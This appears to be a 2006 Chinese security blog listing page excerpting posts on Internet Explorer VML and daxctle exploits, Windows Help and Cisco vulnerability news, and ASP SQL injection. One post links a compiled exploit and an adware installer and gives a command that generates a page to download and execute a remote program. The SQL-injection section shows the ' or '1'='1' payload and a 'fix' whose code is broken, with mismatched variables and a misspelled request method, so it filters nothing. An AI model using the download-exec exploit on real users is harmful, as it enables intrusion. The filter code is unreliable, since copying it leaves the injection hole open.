/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : [url]http://www.xsec.org[/url]
* :
* Tested : Windows 2000 Ser (全文共7346字)——点击
此处阅读全文
IE出现新的漏洞 目前暂时还没有研究出来具体的攻击方法 (wml)
摘要:18日安全公司Sunbelt发现一个漏洞,因Windows的VML库存在的问题可能使用户受到攻击,这个问题不仅影响到IE,还包括最近的Office 2007 Beta版,随后微软也证实了这个漏洞。
新闻来源:
IE再曝漏洞 专家建议禁用java虚拟机
http://security.zol.com.cn/39/392508.html
微软新漏洞影响IE和Office
http://news.mydrivers.com/pages/20060920104727_17912.htm
此处阅读全文
9.13ie漏洞利用程序及测试
摘要:我的利用页面测试地址如下 http://www.ztmsb.com/0913test.htm 大无畏的请帮我测试一下 看是否有 效果
ztmsb的狂热fans请自己下载 http://www.ztmsb.com/install.exe 安装ztmsb专用广告bho ... 每打开10来哥页面就弹出广告
已经编译好的版本如下 :
http://www.ztmsb.com/daxctle2.exe
ag:
d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
(全文共9435字)——点击此处阅读全文
转-Windows帮助系统再爆大漏洞 微软安全问题何时了?
国外的CERT网站今天宣布,在Windows中再度发现一个和IE及其Windows帮助系统功能处理有关的严重漏洞。目前尚无任何针对此漏洞的有效补丁,主流杀毒软件也没有关于此漏洞的病毒定义码。
这个漏洞影响到所有运行Internet Explorer的Windows操作系统。IE中此次发现的这个漏洞为“跨域脚本漏洞”(cross-domain scripting vulnerability),攻击者利用此漏洞可以获得在运行IE的用户计算机上执行任意代码的权限,也可以读取或操作其他域上网站的数据。
目前已经有人私下公开了这个漏洞。由于这个漏洞存在于Windows的帮助系统中,并且系统帮助文件默认都用IE打开,即便用户不使用IE和Outlook,这个漏洞仍然存在。看来微软Windows这个漏洞比以往的更令人毛骨悚然。
关于此漏洞的技术细节描述,请点击全文页面中的链接查看英文技术文档。以前微软的帮助系统就出过大漏洞,现在又冒出一个。我们不禁要问,“微软,你的漏洞怎么就如此层出不穷呢?!”
详细描述
http://www.us-cert.gov/cas/techalerts/TA04-099A.html
Cisco 600系列路由远程溢出漏洞
iDefense 公司的专家日前警告说,Cisco公司600系列的路由器由于设计上的问题,存在一个远程溢出漏洞。这个漏洞使得600系列的路由器招自针对web管理服务的DDOS攻击。
受影响的Cisco产品包括 627, 633, 673, 675, 675E, 677, 677i 以及678 路由器,在接收大量来自不同终端的“GET”请求时,系统将无法处理。通过大量80端口的请求,600系列的路由器可能停止工作。
ASP 的SQL 漏洞的问题...
这个问题我在动力的blog上写过..今天胡KK那里又有人贴出来了 我就顺便转一下.. 告戒一下自己
' or '1'='1'等漏洞问题 :[虽然是此漏洞出现已久。但还是很多个人自己写的代码有次漏洞,比如上次XX大学的XX国家实验室站点]
在login.asp中,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用sql="select * from admin where username="&user&" and password="&pwd&"" 这句来对用户名和密码加以验证。
以常理来考虑的话,这是个很完整的程序了。而在实际的使用过程中,整套程序也的确可能正常使用。
但是如果Userid的值和password的值被赋于:safer' or'1'='1' 这时,sql="select * from admin where username="&user&" and password="&pwd&"" 就成了:
sql="select * from reg where user=safer' or'1'='1' and pass=safer' or'1'='1'
怎么样?!我不说大家也明白了吧!
既然有这样的问题,接下来我们就来看看如何解决它。从上面的程序中各位也可以看出,只要对用户输入的数据进行严格过滤就可以了。具体可以参下面的程序:
<%
user=request.from("UserID")
pass=request.from("password")
for i=1 to len(UserID)
cl=mid(UserID,i,1)
if cl="" or us="%" or us="<" or us=">" then
response.redirect "54safer ..haha"
response.end
end if
next
%>
同样是先取得用户输入数据,然后分析用户输入的每一个字符,如发现异常,则转到错误页面。
if cl="" or us="%" or us="<" or us=">" then 这一句中可以加入任意的过滤字符,跟据具体情况而定。
第1页,共1页